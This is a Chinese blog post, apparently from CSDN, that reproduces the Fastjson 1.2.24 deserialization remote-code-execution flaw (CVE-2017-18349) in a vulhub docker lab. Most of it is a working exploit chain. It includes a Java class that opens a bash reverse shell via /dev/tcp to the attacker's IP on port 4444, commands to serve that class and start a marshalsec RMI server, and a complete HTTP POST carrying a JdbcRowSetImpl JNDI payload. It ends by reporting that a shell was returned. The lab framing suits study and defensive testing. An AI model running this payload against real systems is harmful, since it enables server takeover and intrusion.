【vulhub漏洞复现】Fastjson 1.2.24 反序列化(CVE-2017-18349)漏洞复现

已于 2022-02-21 16:36:48 修改
阅读量1.3k 收藏 1
点赞数 1
分类专栏: vulhub&vulfocus漏洞复现 文章标签: 信息安全
于 2022-02-16 17:13:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59924300/article/details/122967740
版权

漏洞影响范围       

 fastjsonfastjson<=1.2.24

环境搭建:   

1.拉取docker:

cd /home/kali/桌面/vulhub/fastjson/1.2.24-rce
sudo docker-compose up -d

2.查看docker端口映射信息

sudo docker ps

3.在浏览器中输入http://192.168.5.143:8090/

漏洞复现

  1. 探测fastjson版本

抓包修改post提交方式并且添加内容{"@type":"java.lang.AutoCloseable"(显示失败)

  1. 新建TouchFile.java文件内容为:
import java.lang.Runtime;

import java.lang.Process;


public class TouchFile {

 static {

      try {

             Runtime r = Runtime.getRuntime();

             Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/192.168.5.143/4444 0>&1"});

             p.waitFor();

       } catch (Exception e) {


       }

   }

}

然后使用javac 命令对TouchFile.java文件进行编译。(javac TouchFile.java)

  1. 在kali 中使用python开启http服务
python3 -m http.server 1134

把刚才反编译的TouchFile.java放到当前目录下输入http://192.168.5.143:1134/进行检查

使用marshalsec-0.0.3-SNAPSHOT-all.jar

下载地址:https://github.com/RandomRobbieBF/marshalsec-jar

启动一个RMI服务,加载远程类TouchFile.class。

Java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.5.143:1134/#TouchFile" 9996

然后在kali上用NC开启端口监听:

抓包修改post方式,并且添加下面的内容

POST / HTTP/1.1
Host: 192.168.5.143:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 162
{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.5.143:9996/TouchFile",
        "autoCommit":true
    }
}

结果:

并且弹回shell

参考:

https://blog.csdn.net/weixin_44146996/article/details/111860438?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164499669816780366586530%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=164499669816780366586530&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-1-111860438.pc_search_result_cache&utm_term=Fastjson1.2.24RCE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0&spm=1018.2226.3001.4187

FlynnAAAA
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Fastjson代码执行漏洞 [CVE-2022-25845].md
07-09
Fastjson代码执行漏洞 [CVE-2022-25845]
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
【渗透测试漏洞复现fastjson1.2.24漏洞复现详细过程
GX233的博客
04-18 6430
fastjson1.2.24 RCE详细复现
漏洞复现Fastjson反序列化
网络安全知识分享
12-31 5740
Fastjson反序列化一、简介二、序列化与反序列化三、Fastjson漏洞介绍1、漏洞原理2、RMI3、JNDI4、JEP290四、编写的简单测试的环境五、漏洞版本1、fastjson<=1.2.241.1、TemplatesImpl 利用链分析1.2、JNDI利用链分析1.3、JNDI利用1.4、官方进行的修复2、fastjson<=1.2.413、fastjson<=1.2.424fastjson<=1.2.455、fastjson<=1.2.476、1.2.48&lt
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
最新发布
小司机的奥拓
04-23 1395
复现的过程中我也出现了许多的问题,最后发送bp改过的数据包之后,一直无法获取shell,也无法创建文件。后来发现是java和javac的版本问题,一定要保证二者都是1.8的版本!其他fastjson漏洞原理相似,只不过是增加了一下黑白名单的过滤,也存在对应的绕过方法,大家可以CSDN上再搜一搜,有很多相关文章。
Fastjson反序列化漏洞复现
weixin_52501704的博客
01-02 2156
Fastjson反序列化漏洞复现
fastjson反序列化漏洞复现
weixin_58954236的博客
09-11 980
FastJson是Alibaba的一款开源Json解析库,可用于将Java对象转换为其Json表示形式,也可以用于将Json字符串转换为等效的Java对象。近几年来FastJson漏洞层出不穷。RCE漏洞的源头:17年FastJson爆出的1.2.24反序列化漏洞。​ 关于FastJson1.2.24反序列化漏洞,简单来说,就是FastJson通过parseObject/parse将传入的字符串反序列化为Java对象时由于没有进行合理检查而导致的。
SpringBoot Redis配置Fastjson进行序列化和反序列化实现
10-16
主要介绍了SpringBoot Redis配置Fastjson进行序列化和反序列化实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
下面小编就为大家带来一篇springmvc fastjson 反序列化时间格式化方法(推荐)。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6241
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
FastJson反序列化漏洞复现
小赵同学的博客
07-29 3825
漏洞利用FastJson autotype处理Json对象的时候,未对@type字段进行完整的安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞,获取服务器敏感信息,甚至可以利用此漏洞进一步的对服务器数据进行操作。......
Fastjson反序列化漏洞复现(实战案例)
qq_50854662的博客
08-23 1706
Fastjson反序列化漏洞复现(实战案例)
Fastjson反序列化漏洞原理与复现
FisrtBqy的博客
05-15 3025
Ffasjson反序列化漏洞原理与复现
【网络安全】Fastjson反序列化漏洞复现
kali_Ma的博客
12-26 2579
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。
复现fastjson反序化漏洞(fastjson1.2.80)
TVT111的博客
07-21 2279
文章利用JNDI-Injection-Exploit工具,主要讲解如何利用JNDI注入复现fastjson反序化漏洞
漏洞复现CVE-2017-18349FastJson1.2.24反序列化导致任意命令执行漏洞
weixin_42282189的博客
09-13 1830
作者: 村里的小四 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责 0x01 前言 FastJson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。 0x02 影响范围 影响范围:Fastjson1.2.24及之前版本。 0x03 环境准备 3.1 目标环境 3.1.1 靶场环境 vulhub靶场环境:CVE-2017-18349 3.1.2 靶机: Ubuntu2.
fastjson反序列化漏洞复现
weixin_43225966的博客
04-23 767
fastjson 反序列化漏洞复现
fastjson 1.2.24 反序列化导致任意命令执行漏洞
03-16
fastjson 1.2.24 存在反序列化漏洞,攻击者可以利用该漏洞执行任意命令。该漏洞的原因是 fastjson反序列化时未对恶意数据进行足够的校验,导致攻击者可以构造恶意数据,使其被 fastjson 解析时执行任意命令。建议...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值